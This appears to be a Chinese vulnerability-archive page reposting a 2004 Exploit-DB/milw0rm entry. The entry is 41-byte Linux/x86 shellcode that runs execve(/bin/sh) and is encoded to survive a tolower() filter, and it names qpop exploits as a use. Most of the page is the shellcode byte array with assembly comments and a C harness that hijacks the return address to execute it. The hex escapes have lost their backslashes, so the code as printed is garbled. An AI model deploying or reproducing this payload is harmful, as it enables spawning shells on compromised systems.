Linux/x86 – execve(/bin/sh) + ToLower Encoded Shellcode (41 bytes)

Linux/x86 – execve(/bin/sh) + ToLower Encoded Shellcode (41 bytes)

漏洞ID 1054602 漏洞类型
发布时间 2004-09-12 更新时间 2004-09-12
图片[1]-Linux/x86 – execve(/bin/sh) + ToLower Encoded Shellcode (41 bytes)-安全小百科CVE编号 N/A
图片[2]-Linux/x86 – execve(/bin/sh) + ToLower Encoded Shellcode (41 bytes)-安全小百科CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13457
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
 *  Linux/x86
 *  tolower() evasion, execve() /bin/sh 
 *  (eg use: various qpop exploits)
 */

#include <stdio.h>

char c0de[] =
/* main: */
"xebx1b"                                   /* jmp callz                  */
/* start: */
"x5e"                                       /* popl %esi                  */
"x89xf3"                                   /* movl %esi, %ebx            */
"x89xf7"                                   /* movl %esi, %edi            */
"x83xc7x07"                               /* addl $0x07, %edi           */
"x29xc0"                                   /* subl %eax, %eax            */
"xaa"                                       /* stosb %al, %es:(%edi)      */
"x89xf9"                                   /* movl %edi, %ecx            */
"x89xf0"                                   /* movl %esi, %eax            */
"xab"                                       /* stosl %eax, %es:(%edi)     */
"x89xfa"                                   /* movl %edi, %edx            */
"x29xc0"                                   /* subl %eax, %eax            */
"xab"                                       /* stosl %eax, %es:(%edi)     */
"xb0x08"                                   /* movb $0x08, %al            */
"x04x03"                                   /* addb $0x03, %al            */
"xcdx80"                                   /* int $0x80                  */
/* callz: */
"xe8xe0xffxffxff"                       /* call start                 */
/* DATA */
"/bin/sh";

main() {
        int *ret;
        ret=(int *)&ret +2;
        printf("Shellcode lenght=%dn",strlen(c0de));
        (*ret) = (int)c0de;
}

// milw0rm.com [2004-09-12]

相关推荐: Microsoft Windows 2000 IrDA Buffer Overflow Denial of Service Vulnerability

Microsoft Windows 2000 IrDA Buffer Overflow Denial of Service Vulnerability 漏洞ID 1102971 漏洞类型 Boundary Condition Error 发布时间 2001-0…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享